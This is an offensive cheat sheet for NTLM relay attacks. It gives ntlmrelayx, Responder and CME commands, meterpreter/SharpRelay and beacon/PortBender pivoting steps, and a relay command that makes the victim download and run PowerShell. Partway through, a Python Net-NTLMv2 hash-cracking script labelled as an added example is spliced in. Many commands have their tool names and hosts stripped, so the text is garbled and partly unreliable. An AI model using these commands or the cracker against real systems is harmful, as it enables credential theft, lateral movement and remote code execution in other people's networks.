
NTLM Relay

Lateral Movement using Credentials Relaying (taso_x).pdf
Generate a relay list (hosts that do not require SMB signing) with CME and enumerate local admins while relaying:
$ cme smb --gen-relay-list relay.txt
$ -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
Relay & catch hashes (via multi-relay):
$ -smb2support -port 8445 share `pwd`
$ -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
The easier way, though, is to combine the -of/--output-file hashes.txt and -ntlmchallenge 1122334455667788 options: the captured Net-NTLMv2 responses are then written to a file while relaying, and because the server challenge is fixed to a known value, they can be cracked offline against precomputed tables built for that challenge as well as with a regular wordlist.
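As an added example (not from the original page), the script below shows what such a saved line contains and how a candidate password is verified against it offline. It builds a constructed capture line in the same user::domain:server_challenge:ntproofstr:blob layout that ntlmrelayx and Responder write (hashcat mode 5600 format), using the fixed 1122334455667788 challenge from the text, and then recomputes the NTLMv2 proof (MS-NLMP: HMAC-MD5 over the NT hash, uppercase user name and domain, then over server challenge plus blob) for each wordlist entry. The user name, domain, password, timestamp and client challenge are made-up values; MD4 is implemented in pure Python because hashlib's md4 is often missing under OpenSSL 3.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') needs the OpenSSL legacy provider."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((56 - (len(data) + 1) % 64) % 64) + struct.pack("<Q", bit_len)
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1
            a, b, c, d = d, rol((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rol((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NTOWFv2 input: MD4 over the UTF-16LE password."""
    return _md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC_MD5(HMAC_MD5(NTOWF, UPPER(user)+domain), ServerChallenge || blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_capture(line: str):
    """Split a user::domain:challenge:ntproofstr:blob line into typed fields."""
    user, _, domain, chall, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chall), bytes.fromhex(proof), bytes.fromhex(blob)


def check_password(line: str, candidate: str) -> bool:
    user, domain, chall, proof, blob = parse_capture(line)
    return hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chall, blob), proof)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry whose NTLMv2 proof matches the captured one."""
    for candidate in wordlist:
        if check_password(line, candidate):
            return candidate
    return None


FIXED_CHALLENGE = bytes.fromhex("1122334455667788")  # the -ntlmchallenge value from the page


def build_capture(user: str, domain: str, password: str, server_challenge: bytes = FIXED_CHALLENGE) -> str:
    """Constructed capture line; the blob follows MS-NLMP NTLMv2_CLIENT_CHALLENGE layout."""
    target_name = domain.encode("utf-16-le")
    blob = (b"\x01\x01" + b"\x00" * 6                     # RespType, HiRespType, reserved
            + struct.pack("<Q", 132800000000000000)          # constructed FILETIME
            + bytes.fromhex("0011223344556677")              # constructed client challenge
            + b"\x00" * 4
            + b"\x02\x00" + struct.pack("<H", len(target_name)) + target_name  # MsvAvNbDomainName
            + b"\x00" * 4                                    # MsvAvEOL
            + b"\x00" * 4)
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: a relayed user "snovvcrash" in MEGACORP whose password is "Passw0rd!".
SAMPLE_LINE = build_capture("snovvcrash", "MEGACORP", "Passw0rd!")

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(SAMPLE_LINE, ["Summer2023", "Welcome1", "Passw0rd!"]))
```

Every line written by ntlmrelayx with -ntlmchallenge set carries the same 1122334455667788 field, so a table precomputed for that challenge applies to all of them; without the option each line gets a random server challenge and can only be attacked per line.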
Relay Net-NTLMv2 responses obtained through Responder's forced proxy authentication to LDAP(S). Responder's own HTTP server must be turned off in Responder.conf so that ntlmrelayx can listen on the proxy port (3128 below) instead:
$ -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./ -I eth0 -wd -P -v


$ python MEGACORP/snovvcrash:'Passw0rd!'@
$ python -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'

Relaying on Windows

meterpreter + SharpRelay

Divert incoming SMB traffic on Victim to Attacker's local port 445 through an elevated meterpreter session and relay it to Target via the MSF SOCKS server.
1. Add a static route to the Target through the 1st meterpreter session:
meterpreter > route add 1
2. Start MSF SOCKS server:
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST
msf auxiliary(server/socks_proxy) > run -j
3. Set up a reverse port forward so that Victim's port 8445 lands on Attacker's local port 445, then use SharpRelay (which loads the WinDivert driver) to divert incoming SMB traffic on Victim's port 445 to its local port 8445:
meterpreter > portfwd add -R -L -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf > use post/windows/manage/execute_dotnet_assembly
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run
4. Relay the diverted traffic to Target through SOCKS:
$ sudo proxychains4 -q -t smb:// -smb2support
Once SharpRelay has been run, the WinDivert driver must be unloaded (or the host rebooted) before it can be run again. The fake service can be stopped and deleted with one PowerShell command (use sc.exe explicitly, since PowerShell aliases sc to Set-Content):
PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)

beacon + PortBender

Start the SOCKS server and the reverse port forward, upload the WinDivert driver and configure the redirection with PortBender:
beacon> socks 1080
beacon> rportfwd 8445 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445
Relay the planet:
$ sudo proxychains4 -q -t smb:// -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"\")"'
Stop PortBender (kill its job, then the process that loaded the driver):
beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>